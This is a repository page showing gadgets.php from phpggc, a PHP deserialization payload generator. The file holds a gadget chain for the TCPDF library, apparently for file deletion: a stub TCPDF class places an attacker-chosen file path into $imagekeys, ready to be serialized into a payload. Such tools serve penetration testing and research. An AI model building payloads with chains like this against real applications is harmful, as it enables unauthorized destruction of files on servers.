Codebase list phpggc / a334346 gadgetchains / TCPDF / FD / 1 / gadgets.php
a334346

Tree @a334346 (Download .tar.gz)

gadgets.php @a334346raw · history · blame

<?php

class TCPDF {
    protected $imagekeys;
    
    function __construct($remote_file) {
		$this->imagekeys = [
		    $remote_file
        ];
    }
}